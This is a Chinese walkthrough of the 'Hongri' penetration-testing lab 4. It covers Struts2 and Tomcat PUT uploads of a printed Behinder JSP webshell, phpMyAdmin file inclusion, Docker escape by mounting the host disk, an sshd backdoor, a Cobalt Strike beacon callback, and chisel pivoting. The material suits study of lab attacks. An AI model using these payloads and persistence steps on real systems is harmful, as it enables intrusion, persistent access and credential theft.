红日靶场4

环境搭建

注:130网段为模拟外网网段,111网段为内网网段

机器 用户 密码 网卡
kali root / 192.168.130.19
web(ubuntu) ubuntu ubuntu 192.168.130.29
192.168.183.128(域)
DC(win2012) administrator Test2008/zxcvbnm123/ 192.168.183.130
域成员(win7) douser Dotest123 192.168.183.129 
sudo docker start ec 17 09 bb da 3d ab ad

web打点

信息收集

扫描192.168.130.0这个网段之后,对发现的29进行进行一步服务扫描,他在2001端口存在一个文件上传,标题中含有strut2.在2002上存在Tomcat2003上则是PHPmyadmin

️漏洞利用

Struts2

利用检查工具扫描,证实存在漏洞

然后上传小马

访问小马,这里上传地址,我填的和当前小马一样的位置/usr/src/src/main/webapp.内容则为哥斯拉的

哥斯拉连接

Tomcat

访问2002,这里给出了Tomcat的版本,去网上搜索可以得知这个版本存在

burpsuite抓包进行修改,首先修改方法为PUT,后面接上文件名,下面则为冰蝎。放行后正常访问小马

PUT /bk.jsp/ HTTP/1.1

Host: 192.168.130.29:2002

Accept: */*

Accept-Language: en User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)

Connection: close

Content-Type: application/x-www-form-urlencoded

Content-Length: 533

<%@page import="java.util.*,javax.crypto.*,javax.crypto.spec.*"%><%!class U extends ClassLoader{U(ClassLoader c){super(c);}public Class g(byte []b){return super.defineClass(b,0,b.length);}}%><%if (request.getMethod().equals("POST")){String k="e45e329feb5d925b";session.putValue("u",k);Cipher c=Cipher.getInstance("AES");c.init(2,new SecretKeySpec(k.getBytes(),"AES"));new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(pageContext);}%>

冰蝎连接上,发现直接就是root了

PHPmyadmin

可以发现是未授权访问

搜索这个版本的发现存在文件包含http://192.168.130.29:2003/index.php?target=db_sql.php?/../../../../../../../../../etc/passwd验证也确实存在

写入PHP探针,并查看session值

SELECT '<?=phpinfo()?>';

利用session可以包含成功

http://192.168.130.29:2003/index.php?target=db_sql.php?/../../../../../../../../tmp/sess_30a8c757f20ff84e5f9ab9211089105a

但是后面写入一句话之后就是没有连接上

CREATE TABLE bktest(code VARCHAR(100));

INSERT INTO bktest(code) VALUES("<?php @eval($_POST[bk]); ?>")

尝试全局日志写入shell,但后面发现当前用户权限太低根本不行

SHOW GLOBAL VARIABLES LIKE '%secure%'

SHOW VARIABLES LIKE 'general%';

SET GLOBAL general_log='on'

想导出也发现方法没有开启

select @@secure_file_priv

//select '<?php @eval($_POST[bk]) ?>' into outfile '/var/www/html/bk.php'

docker逃逸

由于上来就是root,所以要查看了一下所有文件,果不其然发现了dockerfile,说明此时为docker虚拟环境。

ls -al /

其他检测是否为docker环境的方法还有这个环境检测命令,cgroup可以理解为用户和组的关系

cat /proc/1/cgroup

#组和子任务多的时候可以自己加入检索和判断

cat /proc/1/cgroup | grep -qi docker && echo "IS Docker" || echo "Not Docker"

那如何检测是不是特权模式启动的docker呢,可以执行如下:因为如果是以特权模式启动的话,capeff对应的掩码值应该为0000003fffffffff

cat /proc/self/status | grep -qi "0000003fffffffff" && echo "Is privileged mode" || echo "Not privileged mode"

列出宿主机的磁盘目录

fdisk -l

但是Struts2得到的shell执行之后返回空,所以这里用的是Tomcat拿到的shell

在本地创建一个文件夹,然后将/dev/sda1挂载到这个文件夹上,就可以以物理机的root访问,这里就相当于宿主机的根目录

mkdir /bk

mount /dev/sda1  /bk

cd /bk

ls

这里首先在root目录下创建.ssh目录来更改公钥文件,将提前在kali本地生成的凭据上传并改名为 authorized_keys之后就可以ssh登录,但是这里要注意,应该是Ubuntu考虑密码安全性的原因,在生成公私钥时不要为空密码,复杂度也应该尽量大一些。

cd /bk/root/.ssh

cp bk.pub authorized_keys

//在kali生成的公私钥

ssh-keygen -f bk

ssh root@192.168.130.29 -i bk

权限维持

useradd test1 -g 0 -s /bin/bash

ln -sf /usr/sbin/sshd /usr/local/su;/usr/local/su -oport=12345

为了接下来更好的进入内网操作,这里就选择了转战cs,没错cs也是可以上线Linux的。这里使用了插件,放在cs的目录下执行生成payload然后开启http服务供下载

./genCrossC2.Linux 192.168.130.19 443 .cobaltstrike.beacon_keys null Linux x64 /root/tmp/bktest

下载运行之后上线cs

内网渗透

这边校园网断了我又重新上了一遍,把docker也带上线了。顺带汉化了一下热乎的cs。这边查看网络配置发现了一个网段

但是突然想起那些其他的插件都不能在Linux上面用,在Linux探测主机存活都挺麻烦,就自己写了个简单的脚本传了上去。

#!/bin/bash

NET=192.168.183.

IP=1

while [ $IP -lt 255 ]

do

  let IP++

  if `ping -c2 -i0.2 -w2 $NET$IP &> /dev/null`

  then echo -e "$NET$IP is up"

  else echo -e "$NET$IP is down"

  fi

done

发现了128.129.130存活,但是接下来继续寻找脆弱资产一点都不方便

但头铁想试一试,传了nmap上去。扫到129为win7,当前域为demo.com,而且开放了445,可能有永恒之蓝

130上面也开放了445,但是接下来漏洞利用就不好搞了,不尝试了直接转战msf

尝试让msf强制走cs的代理

这边vps也开放了端口但是不行,后知后觉目标机器不出网!

老老实实上传了一个msf之后,就是添加路由入段,然后扫了一下win7和DC都有永恒之蓝,但打了很多很多次都不行

use auxiliary/scanner/smb/smb_ms17_010

set rhosts 192.

168.183.126/24

set threads 100

run

msf的代理时不时就断不是很稳定,于是就尝试用chisel做转发

./chisel_1.7.7_linux_amd64 client 192.168.130.29:9999 socks

./chisel_1.7.7_linux_amd64 server -p 9999 --socks5

过一会很快就拿到session了

上来先load kiwi拿一下凭证

但是这里管理员的密码拿不到,拿去解密也解不出来,用run post/windows/manage/enable_rdp打开远程桌面端口之后登不上去。最最关键的是shell切不进去,真的搞

当前的用户也无权登入,没办法了就到这里了

红日靶场4-wp的更多相关文章

  1. Vulnhub靶场DC-1 WP

    前言 之前提到过最近在做vlunhub的靶场复现工作,今天开始更新writeup吧.(对着walkthrough一顿乱抄嘻嘻嘻) 关于DC-1(官网翻译来的) 描述 DC-1是一个专门构建的易受攻击的 ...

  2. Vulnhub 靶场 Os-hackNos WP

    About Os-hackNos 描述 Difficulty : Easy to Intermediate Flag : 2 Flag first user And second root Learn ...

  3. Vulnhub 靶场 Dijnn WP

    About djinn: 1 描述 难度级别:中等 Flag:user.txt和root.txt 说明:该计算机是VirtualBox以及VMWare兼容的.DHCP将自动分配IP.您将在登录屏幕上看 ...

  4. Vulnhub靶场 DC-2 WP

    DC-2简介 描述 与DC-1一样,DC-2是另一个专门构建的易受攻击的实验室,目的是获得渗透测试领域的经验. 与原始DC-1一样,它在设计时就考虑了初学者. 必须具备Linux技能并熟悉Linux命 ...

  5. 【Penetration】红日靶场(一)

    nmap探查存活主机 nmap -sP 10.10.2.0/24 图片: https://uploader.shimo.im/f/cfuQ653BEvyA42FR.png!thumbnail?acce ...

  6. Vulnhub靶场渗透练习(三) bulldog

    拿到靶场后先对ip进行扫描 获取ip  和端口 针对项目路径爆破 获取两个有用文件 http://192.168.18.144/dev/ dev,admin 更具dev 发现他们用到框架和语言 找到一 ...

  7. Vulnhub靶场题解

    Vulnhub简介 Vulnhub是一个提供各种漏洞环境的靶场平台,供安全爱好者学习渗透使用,大部分环境是做好的虚拟机镜像文件,镜像预先设计了多种漏洞,需要使用VMware或者VirtualBox运行 ...

  8. [红日安全]Web安全Day1 - SQL注入实战攻防

    本文由红日安全成员: Aixic 编写,如有不当,还望斧正. 大家好,我们是红日安全-Web安全攻防小组.此项目是关于Web安全的系列文章分享,还包含一个HTB靶场供大家练习,我们给这个项目起了一个名 ...

  9. [红日安全]Web安全Day2 - XSS跨站实战攻防

    本文由红日安全成员: Aixic 编写,如有不当,还望斧正. 大家好,我们是红日安全-Web安全攻防小组.此项目是关于Web安全的系列文章分享,还包含一个HTB靶场供大家练习,我们给这个项目起了一个名 ...

  10. [红日安全]Web安全Day3 - CSRF实战攻防

    本文由红日安全成员: Once 编写,如有不当,还望斧正. 大家好,我们是红日安全-Web安全攻防小组.此项目是关于Web安全的系列文章分享,还包含一个HTB靶场供大家练习,我们给这个项目起了一个名字 ...

随机推荐

  1. AK、SK实现(双方API交互:签名及验证)

    参考:https://blog.csdn.net/yqwang75457/article/details/117815474 1.原理 AK/SK: AK:Access Key Id,用于标示用户. ...

  2. 「codeforces - 1344D」Résumé Review

    link. 有点狗,但还算个好题. 设定 \(f_i(x)=a_ix-x^3\),\(\Delta_i(x)=f_i(x)-f_i(x-1)\),可以洞察到 \(\Delta_i(x)\) 在正自然数 ...

  3. oracle-应用连接数激增测试

    在生产环境遇见过表的连接数过高,导致系统宕机的问题,操作上是由于在大表上建立索引,造成全表锁.故手动在表加表级锁,表上的应用不停,查看Oracle数据库连接数是否激增. 1 应用正常运行,查看当前数据 ...

  4. Spring Boot中发送邮件时,如何让发件人显示别名

    之前,我们通过一系列文章,介绍了如何在Spring Boot中发送邮件: 发送邮件 添加附件 引用静态资源 邮件模版 已经包含了大部分的应用场景.但最近DD在做YouTube中文配音的时候,碰到一个问 ...

  5. 一次考试的dp题

    很明显是dp 看题目的时候我们先进行初步的思考,发现一个性质 一个点时不可能被重复覆盖三次的很显然,如果一个点被覆盖了3次,这3个覆盖他的区间一定是有一个区间被完全包含的,因为有贡献的左右端点只有两个 ...

  6. Windows下VC++编译器32位memcpy、memmove函数汇编代码详解

    整理者:赤勇玄心行天道 QQ号:280604597 微信号:qq280604597 QQ群:511046632 博客:www.cnblogs.com/gaoyaguo  blog.csdn.net/c ...

  7. docker本地仓库-registry

    Docker本地私有仓库实战: docker仓库主要用于存放docker镜像,docker仓库分为公有仓库和私有仓库,基于registry可以搭建本地私有仓库,使用私有仓库的优点如下: 节省网络带宽, ...

  8. JSON文件解析工具类(java)

    JSON文本转JSONObject对象 当我们给前端返回样式的时候,需要处理json格式的前端样式,往往只需要改变局部数据.但是每次操作都要构造一个JSON对象,如果层级比较多的话,写法较为复杂,也不 ...

  9. Velocity之Hello World(tomcat下配置Velocity)

    本文主要参考:http://hi.baidu.com/dalianjingying/item/1fb3a98ad64dcac299255f72 http://wangbaoaiboy.blog.163 ...

  10. 分享一次公司晋级考试的SQL题目,非常有趣的案例(postgresql 标量子查询 where lie 谓词过滤条件)

    同事今天晋级高级工程师考试,发来一道公司出题目让我帮忙进行优化,其中场景二的案例非常有意思. 题目内容如下: 原始SQL: scott=> explain analyze scott-> ...